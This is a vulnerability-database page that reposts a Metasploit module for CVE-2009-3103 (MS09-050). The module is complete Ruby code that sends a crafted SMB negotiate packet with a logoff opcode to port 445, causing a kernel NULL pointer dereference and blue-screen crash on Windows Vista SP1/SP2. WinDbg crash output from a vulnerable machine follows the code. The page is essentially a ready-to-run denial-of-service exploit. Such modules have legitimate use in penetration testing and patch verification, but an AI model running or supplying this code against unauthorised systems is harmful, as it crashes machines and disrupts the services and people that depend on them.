Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Microsoft SRV2.SYS SMB2 Logoff Remote Kernel NULL Pointer Dereference

🗓️ 31 Aug 2024 00:00:00Reported by Jay Turla, metasploit.comType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 150 Views

Microsoft SRV2.SYS SMB2 Logoff Remote Kernel NULL Pointer Dereference triggers BSOD on Vista SP1/SP2 due to SMB2 logoff request before correct negotiation, resolved with MS09-05

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Microsoft Windows - 'srv2.sys' SMB Code Execution (Python) (MS09-050) Exploit
26 Feb 201600:00
zdt
GithubExploit		Exploit for CVE-2009-3103
26 Jan 202607:13
githubexploit
Circl		CVE-2009-3103
9 Sep 200900:00
circl
Check Point Advisories		Microsoft Windows Server Remote Code Execution (CVE-2009-3103)
30 May 202100:00
checkpoint_advisories
Check Point Advisories		Microsoft Windows SMB Negotiate Request Remote Code Execution (CVE-2009-2532; CVE-2009-3103)
9 Sep 200900:00
checkpoint_advisories
CVE		CVE-2009-3103
8 Sep 200922:00
cve
Cvelist		CVE-2009-3103
8 Sep 200922:00
cvelist
Exploit DB		Microsoft Windows - 'srv2.sys' SMB Negotiate ProcessID Function Table Dereference (MS09-050) (Metasploit)
3 Jul 201000:00
exploitdb
Metasploit		Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference
15 Apr 201016:08
metasploit
Metasploit		Microsoft SRV2.SYS SMB2 Logoff Remote Kernel NULL Pointer Dereference
15 Apr 201016:08
metasploit
Rows per page
`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::Tcp  
include Msf::Auxiliary::Dos  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Microsoft SRV2.SYS SMB2 Logoff Remote Kernel NULL Pointer Dereference',  
'Description' => %q{  
This module triggers a NULL pointer dereference in the SRV2.SYS kernel driver when processing  
an SMB2 logoff request before a session has been correctly negotiated, resulting in a BSOD.  
Effecting Vista SP1/SP2 (And possibly Server 2008 SP1/SP2), the flaw was resolved with MS09-050.  
},  
'Author' => [ 'sf' ],  
'License' => MSF_LICENSE,  
'References' =>  
[  
[ 'CVE', '2009-3103'],  
[ 'OSVDB', '57799' ],  
[ 'MSB', 'MS09-050' ],  
]  
))  
  
register_options( [ Opt::RPORT( 445 ) ])  
end  
  
def run  
print_status( "Targeting host #{datastore['RHOST']}:#{datastore['RPORT']}..." )  
connect  
  
dialects = [ "AAAA" + [ 0xDEADC0DE ].pack( "V" ) + [ 0xCAFEF00D ].pack( "V" ), "SMB 2.002" ]  
  
data = dialects.collect { |dialect| "\x02" + dialect + "\x00" }.join( '' )  
data += "A" * 128  
  
packet = Rex::Proto::SMB::Constants::SMB_NEG_PKT.make_struct  
  
packet['Payload']['SMB'].v['Command'] = Rex::Proto::SMB::Constants::SMB_COM_NEGOTIATE  
packet['Payload']['SMB'].v['Flags1'] = 0x18  
packet['Payload']['SMB'].v['Flags2'] = 0xC853  
packet['Payload']['SMB'].v['ProcessIDHigh'] = Rex::Proto::SMB::Constants::SMB2_OP_LOGOFF  
packet['Payload'].v['Payload'] = data  
  
packet = packet.to_s  
  
print_status( "Sending the exploit packet (#{packet.length} bytes)..." )  
sock.put( packet )  
  
response = sock.get_once  
  
if( not response )  
print_status( "No response. The target system has probably crashed." )  
else  
print_status( "Response received. The target system is not vulnerable:\n#{response.inspect}" )  
end  
  
disconnect  
end  
end  
  
=begin  
  
Some WinDbg output from a vulnerable Vista SP2 machine:  
  
CONTEXT:  
eax=0032bfbc ebx=9beafb20 ecx=0000000a edx=00000000 esi=00000000 edi=9be8e690  
eip=9935a9d1 esp=98b86cb8 ebp=98b86cc0 iopl=0 nv up ei pl nz na po nc  
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010202  
srv2!RfsTableLookup+0xa:  
9935a9d1 837e4800 cmp dword ptr [esi+48h],0 ds:0023:00000048=????????  
  
STACK_TEXT:  
98b86cc0 99359f95 00000000 0032bfbc 9be8e830 srv2!RfsTableLookup+0xa  
98b86cdc 99364328 9be8e690 DEADC0DE CAFEF00D srv2!SrvVerifySessionEx+0xdc  
98b86d00 9935a6cc 9be8e690 00000000 9be8e690 srv2!Smb2ValidateLogoff+0x3c  
98b86d3c 99374a7f 9be8e690 98c1e018 9be8e690 srv2!Smb2ValidateProviderCallback+0x501  
98b86d50 9937319f 9be8e690 00000000 98c4f020 srv2!SrvProcessPacket+0x4b  
98b86d7c 81a0ec42 00000000 b52bf019 00000000 srv2!SrvProcWorkerThread+0x19a  
98b86dc0 81877efe 99373005 98c1e018 00000000 nt!PspSystemThreadStartup+0x9d  
00000000 00000000 00000000 00000000 00000000 nt!KiThreadStartup+0x16  
=end  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
31 Aug 2024 00:00Current
7High risk
Vulners AI Score7
CVSS 210
EPSS0.92861
microsoftsrv2.syssmb2logoffremotekernelnull pointerdereferencebsodvista sp1vista sp2smb2 logoffms09-050
150